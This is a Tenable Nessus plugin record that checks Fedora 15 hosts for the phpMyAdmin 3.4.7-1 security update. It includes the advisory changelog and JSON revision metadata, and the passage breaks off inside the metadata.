ID FEDORA_2011-15469.NASL Type nessus Reporter This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2019-12-02T00:00:00
Description
Changes for 3.4.7.0 (2011-10-23);
[interface] Links in navigation when
$cfg[
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Fedora Security Advisory 2011-15469.
#
include("compat.inc");
if (description)
{
script_id(56798);
script_version("1.8");
script_cvs_date("Date: 2019/08/02 13:32:34");
script_cve_id("CVE-2011-3646", "CVE-2011-4064");
script_xref(name:"FEDORA", value:"2011-15469");
script_name(english:"Fedora 15 : phpMyAdmin-3.4.7-1.fc15 (2011-15469)");
script_summary(english:"Checks rpm output for the updated package.");
script_set_attribute(
attribute:"synopsis",
value:"The remote Fedora host is missing a security update."
);
script_set_attribute(
attribute:"description",
value:
"Changes for 3.4.7.0 (2011-10-23);
- [interface] Links in navigation when
$cfg['MainPageIconic'] =3D false
- [interface] Inline edit shows dropdowns even after
closing
- [view] View renaming did not work
- [navi] Wrong icon for view (MySQL 5.5)
- [doc] Missing documentation section
- [pdf] Broken PDF file when exporting database to PDF
- [core] Allow to set language in URL
- [doc] Fix links to PHP documentation
- [export] Export to bzip2 is not working
Changes for 3.4.6.0 (2011-10-16) :
- [patch] InnoDB comment display with tooltips/aliases
- [navi] Edit SQL statement after error
- [interface] Collation not displayed for long enum
fields
- [export] Config for export compression not used
- [privileges] DB-specific privileges won't submit
- [config] Configuration storage incorrect suggested
table name
- [interface] Cannot execute saved query
- [display] Full text button unchecks results display
options
- [display] Broken binary column when 'Show binary
contents' is not set
- [core] Call to undefined function PMA_isSuperuser()
- [interface] Display options link missing after search
- [core] CSP policy causing designer JS buttons to fail
- [relation] Relations/constraints are dropped/created
on every change
- [display] Delete records from last page breaks search
- [schema] PMA_User_Schema::processUserChoice() is
broken
- [core] External link fails in 3.4.5
- [display] CharTextareaRows is not respected
- [synchronize] Extraneous db choices
- [security] Fixed local path disclosure vulnerability,
see PMASA-2011-15=
(http://www.phpmyadmin.net/home_page/security/PMASA-20
11-15.php)
- [security] Fixed XSS in setup (host/verbose parameter),
see PMASA-2011-= 16
(http://www.phpmyadmin.net/home_page/security/PMASA-2011
-16.php)
--------------------------------------------------------
-------------------=
Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues."
);
# http://www.phpmyadmin.net/home_page/security/PMASA-2011-15.php
script_set_attribute(
attribute:"see_also",
value:"https://www.phpmyadmin.net/security/PMASA-2011-15/"
);
# http://www.phpmyadmin.net/home_page/security/PMASA-2011-16.php
script_set_attribute(
attribute:"see_also",
value:"https://www.phpmyadmin.net/security/PMASA-2011-16/"
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.redhat.com/show_bug.cgi?id=746880"
);
# https://lists.fedoraproject.org/pipermail/package-announce/2011-November/069237.html
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?1e5fda7b"
);
script_set_attribute(
attribute:"solution",
value:"Update the affected phpMyAdmin package."
);
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:phpMyAdmin");
script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:15");
script_set_attribute(attribute:"patch_publication_date", value:"2011/11/05");
script_set_attribute(attribute:"plugin_publication_date", value:"2011/11/14");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"Fedora Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora");
os_ver = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
os_ver = os_ver[1];
if (! ereg(pattern:"^15([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 15.x", "Fedora " + os_ver);
if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);
flag = 0;
if (rpm_check(release:"FC15", reference:"phpMyAdmin-3.4.7-1.fc15")) flag++;
if (flag)
{
if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());
else security_warning(0);
exit(0);
}
else
{
tested = pkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "phpMyAdmin");
}
{"id": "FEDORA_2011-15469.NASL", "bulletinFamily": "scanner", "title": "Fedora 15 : phpMyAdmin-3.4.7-1.fc15 (2011-15469)", "description": "Changes for 3.4.7.0 (2011-10-23);\n\n - [interface] Links in navigation when\n $cfg[", "published": "2011-11-14T00:00:00", "modified": "2019-12-02T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "https://www.tenable.com/plugins/nessus/56798", "reporter": "This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?1e5fda7b", "https://www.phpmyadmin.net/security/PMASA-2011-16/", "https://www.phpmyadmin.net/security/PMASA-2011-15/", "https://bugzilla.redhat.com/show_bug.cgi?id=746880"], "cvelist": ["CVE-2011-3646", "CVE-2011-4064"], "type": "nessus", "lastseen": "2019-12-13T07:03:28", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:fedoraproject:fedora:15", "p-cpe:/a:fedoraproject:fedora:phpMyAdmin"], "cvelist": ["CVE-2011-3646", "CVE-2011-4064"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "description": "Changes for 3.4.7.0 (2011-10-23);\n\n - [interface] Links in navigation when $cfg['MainPageIconic'] =3D false\n\n - [interface] Inline edit shows dropdowns even after closing\n\n - [view] View renaming did not work\n\n - [navi] Wrong icon for view (MySQL 5.5)\n\n - [doc] Missing documentation section\n\n - [pdf] Broken PDF file when exporting database to PDF\n\n - [core] Allow to set language in URL\n\n - [doc] Fix links to PHP documentation\n\n - [export] Export to bzip2 is not working\n\nChanges for 3.4.6.0 (2011-10-16) :\n\n - [patch] InnoDB comment display with tooltips/aliases\n\n - [navi] Edit SQL statement after error\n\n - [interface] Collation not displayed for long enum fields\n\n - [export] Config for export compression not used\n\n - [privileges] DB-specific privileges won't submit\n\n - [config] Configuration storage incorrect suggested table name\n\n - [interface] Cannot execute saved query\n\n - [display] Full text button unchecks results display options\n\n - [display] Broken binary column when 'Show binary contents' is not set\n\n - [core] Call to undefined function PMA_isSuperuser()\n\n - [interface] Display options link missing after search\n\n - [core] CSP policy causing designer JS buttons to fail\n\n - [relation] Relations/constraints are dropped/created on every change\n\n - [display] Delete records from last page breaks search\n\n - [schema] PMA_User_Schema::processUserChoice() is broken\n\n - [core] External link fails in 3.4.5\n\n - [display] CharTextareaRows is not respected\n\n - [synchronize] Extraneous db choices\n\n - [security] Fixed local path disclosure vulnerability, see PMASA-2011-15= (http://www.phpmyadmin.net/home_page/security/PMASA-20 11-15.php)\n\n - [security] Fixed XSS in setup (host/verbose parameter), see PMASA-2011-= 16 (http://www.phpmyadmin.net/home_page/security/PMASA-2011\n -16.php)\n --------------------------------------------------------\n -------------------=\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 5, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}}, "hash": "8d83597b82adefeaa0d47ad8d185af2d5a88a0ec44adfa9dad2791bf6bb9fdf3", "hashmap": [{"hash": "350b26b71cccd9ed3db5ac4fed2811be", "key": "title"}, {"hash": "4a6aa59cee913088d05117547f8e824a", "key": "modified"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "0c225a5531d94e6fd7b9e12dba162a79", "key": "sourceData"}, {"hash": "2d1ff01fca6c4e8332328f748feb905f", "key": "cvelist"}, {"hash": "a792e2393dff1e200b885c5245988f6f", "key": "cvss"}, {"hash": "18b737c37904700fbd5c98a4b1e5d2a8", "key": "references"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "70c3468e152c9031eb974ad57af7a5d2", "key": "href"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "fae755fe64732027b1326b597da0a3d4", "key": "description"}, {"hash": "cb7fb37fdca009fce8f61733a6ae5652", "key": "pluginID"}, {"hash": "41576782ddde1c74fb02088838f852a8", "key": "published"}, {"hash": "4b9ea36fd83076a8422902145214c024", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=56798", "id": "FEDORA_2011-15469.NASL", "lastseen": "2018-12-25T02:19:21", "modified": "2018-12-24T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "56798", "published": "2011-11-14T00:00:00", "references": ["http://www.nessus.org/u?1e5fda7b", "https://www.phpmyadmin.net/security/PMASA-2011-16/", "https://www.phpmyadmin.net/security/PMASA-2011-15/", "https://bugzilla.redhat.com/show_bug.cgi?id=746880"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-15469.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(56798);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/12/24 10:14:27\");\n\n script_cve_id(\"CVE-2011-3646\", \"CVE-2011-4064\");\n script_xref(name:\"FEDORA\", value:\"2011-15469\");\n\n script_name(english:\"Fedora 15 : phpMyAdmin-3.4.7-1.fc15 (2011-15469)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Changes for 3.4.7.0 (2011-10-23);\n\n - [interface] Links in navigation when\n $cfg['MainPageIconic'] =3D false\n\n - [interface] Inline edit shows dropdowns even after\n closing\n\n - [view] View renaming did not work\n\n - [navi] Wrong icon for view (MySQL 5.5)\n\n - [doc] Missing documentation section\n\n - [pdf] Broken PDF file when exporting database to PDF\n\n - [core] Allow to set language in URL\n\n - [doc] Fix links to PHP documentation\n\n - [export] Export to bzip2 is not working\n\nChanges for 3.4.6.0 (2011-10-16) :\n\n - [patch] InnoDB comment display with tooltips/aliases\n\n - [navi] Edit SQL statement after error\n\n - [interface] Collation not displayed for long enum\n fields\n\n - [export] Config for export compression not used\n\n - [privileges] DB-specific privileges won't submit\n\n - [config] Configuration storage incorrect suggested\n table name\n\n - [interface] Cannot execute saved query\n\n - [display] Full text button unchecks results display\n options\n\n - [display] Broken binary column when 'Show binary\n contents' is not set\n\n - [core] Call to undefined function PMA_isSuperuser()\n\n - [interface] Display options link missing after search\n\n - [core] CSP policy causing designer JS buttons to fail\n\n - [relation] Relations/constraints are dropped/created\n on every change\n\n - [display] Delete records from last page breaks search\n\n - [schema] PMA_User_Schema::processUserChoice() is\n broken\n\n - [core] External link fails in 3.4.5\n\n - [display] CharTextareaRows is not respected\n\n - [synchronize] Extraneous db choices\n\n - [security] Fixed local path disclosure vulnerability,\n see PMASA-2011-15=\n (http://www.phpmyadmin.net/home_page/security/PMASA-20\n 11-15.php)\n\n - [security] Fixed XSS in setup (host/verbose parameter),\n see PMASA-2011-= 16\n (http://www.phpmyadmin.net/home_page/security/PMASA-2011\n -16.php)\n --------------------------------------------------------\n -------------------=\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2011-15.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-15/\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2011-16.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-16/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=746880\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-November/069237.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1e5fda7b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"phpMyAdmin-3.4.7-1.fc15\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "title": "Fedora 15 : phpMyAdmin-3.4.7-1.fc15 (2011-15469)", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 5, "lastseen": "2018-12-25T02:19:21"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:fedoraproject:fedora:15", "p-cpe:/a:fedoraproject:fedora:phpMyAdmin"], "cvelist": ["CVE-2011-3646", "CVE-2011-4064"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "description": "Changes for 3.4.7.0 (2011-10-23);\n\n - [interface] Links in navigation when $cfg['MainPageIconic'] =3D false\n\n - [interface] Inline edit shows dropdowns even after closing\n\n - [view] View renaming did not work\n\n - [navi] Wrong icon for view (MySQL 5.5)\n\n - [doc] Missing documentation section\n\n - [pdf] Broken PDF file when exporting database to PDF\n\n - [core] Allow to set language in URL\n\n - [doc] Fix links to PHP documentation\n\n - [export] Export to bzip2 is not working\n\nChanges for 3.4.6.0 (2011-10-16) :\n\n - [patch] InnoDB comment display with tooltips/aliases\n\n - [navi] Edit SQL statement after error\n\n - [interface] Collation not displayed for long enum fields\n\n - [export] Config for export compression not used\n\n - [privileges] DB-specific privileges won't submit\n\n - [config] Configuration storage incorrect suggested table name\n\n - [interface] Cannot execute saved query\n\n - [display] Full text button unchecks results display options\n\n - [display] Broken binary column when 'Show binary contents' is not set\n\n - [core] Call to undefined function PMA_isSuperuser()\n\n - [interface] Display options link missing after search\n\n - [core] CSP policy causing designer JS buttons to fail\n\n - [relation] Relations/constraints are dropped/created on every change\n\n - [display] Delete records from last page breaks search\n\n - [schema] PMA_User_Schema::processUserChoice() is broken\n\n - [core] External link fails in 3.4.5\n\n - [display] CharTextareaRows is not respected\n\n - [synchronize] Extraneous db choices\n\n - [security] Fixed local path disclosure vulnerability, see PMASA-2011-15= (http://www.phpmyadmin.net/home_page/security/PMASA-20 11-15.php)\n\n - [security] Fixed XSS in setup (host/verbose parameter), see PMASA-2011-= 16 (http://www.phpmyadmin.net/home_page/security/PMASA-2011\n -16.php)\n --------------------------------------------------------\n -------------------=\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 7, "enchantments": {"dependencies": {"modified": "2019-02-21T01:15:39", "references": [{"idList": ["FEDORA_2011-15460.NASL", "GENTOO_GLSA-201201-01.NASL", "PHPMYADMIN_PMASA_2011_16.NASL", "FEDORA_2011-15472.NASL"], "type": "nessus"}, {"idList": ["OPENVAS:1361412562310902585", "OPENVAS:864063", "OPENVAS:1361412562310801994", "OPENVAS:1361412562310863617", "OPENVAS:863617", "OPENVAS:1361412562310863619", "OPENVAS:1361412562310831480", "OPENVAS:863619", "OPENVAS:831480", "OPENVAS:1361412562310864063"], "type": "openvas"}, {"idList": ["SSV:23110"], "type": "seebug"}, {"idList": ["GLSA-201201-01"], "type": "gentoo"}, {"idList": ["CVE-2011-3646", "CVE-2011-4064"], "type": "cve"}, {"idList": ["PHPMYADMIN:PMASA-2011-15", "PHPMYADMIN:PMASA-2011-16"], "type": "phpmyadmin"}]}, "score": {"modified": "2019-02-21T01:15:39", "value": 6.1, "vector": "NONE"}}, "hash": "8d83597b82adefeaa0d47ad8d185af2d5a88a0ec44adfa9dad2791bf6bb9fdf3", "hashmap": [{"hash": "350b26b71cccd9ed3db5ac4fed2811be", "key": "title"}, {"hash": "4a6aa59cee913088d05117547f8e824a", "key": "modified"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "0c225a5531d94e6fd7b9e12dba162a79", "key": "sourceData"}, {"hash": "2d1ff01fca6c4e8332328f748feb905f", "key": "cvelist"}, {"hash": "a792e2393dff1e200b885c5245988f6f", "key": "cvss"}, {"hash": "18b737c37904700fbd5c98a4b1e5d2a8", "key": "references"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "70c3468e152c9031eb974ad57af7a5d2", "key": "href"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "fae755fe64732027b1326b597da0a3d4", "key": "description"}, {"hash": "cb7fb37fdca009fce8f61733a6ae5652", "key": "pluginID"}, {"hash": "41576782ddde1c74fb02088838f852a8", "key": "published"}, {"hash": "4b9ea36fd83076a8422902145214c024", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=56798", "id": "FEDORA_2011-15469.NASL", "lastseen": "2019-02-21T01:15:39", "modified": "2018-12-24T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "56798", "published": "2011-11-14T00:00:00", "references": ["http://www.nessus.org/u?1e5fda7b", "https://www.phpmyadmin.net/security/PMASA-2011-16/", "https://www.phpmyadmin.net/security/PMASA-2011-15/", "https://bugzilla.redhat.com/show_bug.cgi?id=746880"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-15469.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(56798);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/12/24 10:14:27\");\n\n script_cve_id(\"CVE-2011-3646\", \"CVE-2011-4064\");\n script_xref(name:\"FEDORA\", value:\"2011-15469\");\n\n script_name(english:\"Fedora 15 : phpMyAdmin-3.4.7-1.fc15 (2011-15469)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Changes for 3.4.7.0 (2011-10-23);\n\n - [interface] Links in navigation when\n $cfg['MainPageIconic'] =3D false\n\n - [interface] Inline edit shows dropdowns even after\n closing\n\n - [view] View renaming did not work\n\n - [navi] Wrong icon for view (MySQL 5.5)\n\n - [doc] Missing documentation section\n\n - [pdf] Broken PDF file when exporting database to PDF\n\n - [core] Allow to set language in URL\n\n - [doc] Fix links to PHP documentation\n\n - [export] Export to bzip2 is not working\n\nChanges for 3.4.6.0 (2011-10-16) :\n\n - [patch] InnoDB comment display with tooltips/aliases\n\n - [navi] Edit SQL statement after error\n\n - [interface] Collation not displayed for long enum\n fields\n\n - [export] Config for export compression not used\n\n - [privileges] DB-specific privileges won't submit\n\n - [config] Configuration storage incorrect suggested\n table name\n\n - [interface] Cannot execute saved query\n\n - [display] Full text button unchecks results display\n options\n\n - [display] Broken binary column when 'Show binary\n contents' is not set\n\n - [core] Call to undefined function PMA_isSuperuser()\n\n - [interface] Display options link missing after search\n\n - [core] CSP policy causing designer JS buttons to fail\n\n - [relation] Relations/constraints are dropped/created\n on every change\n\n - [display] Delete records from last page breaks search\n\n - [schema] PMA_User_Schema::processUserChoice() is\n broken\n\n - [core] External link fails in 3.4.5\n\n - [display] CharTextareaRows is not respected\n\n - [synchronize] Extraneous db choices\n\n - [security] Fixed local path disclosure vulnerability,\n see PMASA-2011-15=\n (http://www.phpmyadmin.net/home_page/security/PMASA-20\n 11-15.php)\n\n - [security] Fixed XSS in setup (host/verbose parameter),\n see PMASA-2011-= 16\n (http://www.phpmyadmin.net/home_page/security/PMASA-2011\n -16.php)\n --------------------------------------------------------\n -------------------=\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2011-15.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-15/\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2011-16.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-16/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=746880\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-November/069237.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1e5fda7b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"phpMyAdmin-3.4.7-1.fc15\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "title": "Fedora 15 : phpMyAdmin-3.4.7-1.fc15 (2011-15469)", "type": "nessus", "viewCount": 2}, "differentElements": ["cvss", "description", "reporter", "modified", "sourceData", "href"], "edition": 7, "lastseen": "2019-02-21T01:15:39"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:fedoraproject:fedora:15", "p-cpe:/a:fedoraproject:fedora:phpMyAdmin"], "cvelist": ["CVE-2011-3646", "CVE-2011-4064"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "description": "Changes for 3.4.7.0 (2011-10-23);\n\n - [interface] Links in navigation when $cfg['MainPageIconic'] =3D false\n\n - [interface] Inline edit shows dropdowns even after closing\n\n - [view] View renaming did not work\n\n - [navi] Wrong icon for view (MySQL 5.5)\n\n - [doc] Missing documentation section\n\n - [pdf] Broken PDF file when exporting database to PDF\n\n - [core] Allow to set language in URL\n\n - [doc] Fix links to PHP documentation\n\n - [export] Export to bzip2 is not working\n\nChanges for 3.4.6.0 (2011-10-16) :\n\n - [patch] InnoDB comment display with tooltips/aliases\n\n - [navi] Edit SQL statement after error\n\n - [interface] Collation not displayed for long enum fields\n\n - [export] Config for export compression not used\n\n - [privileges] DB-specific privileges won't submit\n\n - [config] Configuration storage incorrect suggested table name\n\n - [interface] Cannot execute saved query\n\n - [display] Full text button unchecks results display options\n\n - [display] Broken binary column when 'Show binary contents' is not set\n\n - [core] Call to undefined function PMA_isSuperuser()\n\n - [interface] Display options link missing after search\n\n - [core] CSP policy causing designer JS buttons to fail\n\n - [relation] Relations/constraints are dropped/created on every change\n\n - [display] Delete records from last page breaks search\n\n - [schema] PMA_User_Schema::processUserChoice() is broken\n\n - [core] External link fails in 3.4.5\n\n - [display] CharTextareaRows is not respected\n\n - [synchronize] Extraneous db choices\n\n - [security] Fixed local path disclosure vulnerability, see PMASA-2011-15= (http://www.phpmyadmin.net/home_page/security/PMASA-20 11-15.php)\n\n - [security] Fixed XSS in setup (host/verbose parameter), see PMASA-2011-= 16 (http://www.phpmyadmin.net/home_page/security/PMASA-2011\n -16.php)\n --------------------------------------------------------\n -------------------=\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 4, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}}, "hash": "ce8f7a2ec7122c824f76ea7608badcc6d72f1306ce4d2c7a661347e4443c6073", "hashmap": [{"hash": "350b26b71cccd9ed3db5ac4fed2811be", "key": "title"}, {"hash": "de38caaccc231e6a74b77a602b35db95", "key": "modified"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "591f977c3bdb4c331e82410b4a2aabed", "key": "sourceData"}, {"hash": "2d1ff01fca6c4e8332328f748feb905f", "key": "cvelist"}, {"hash": 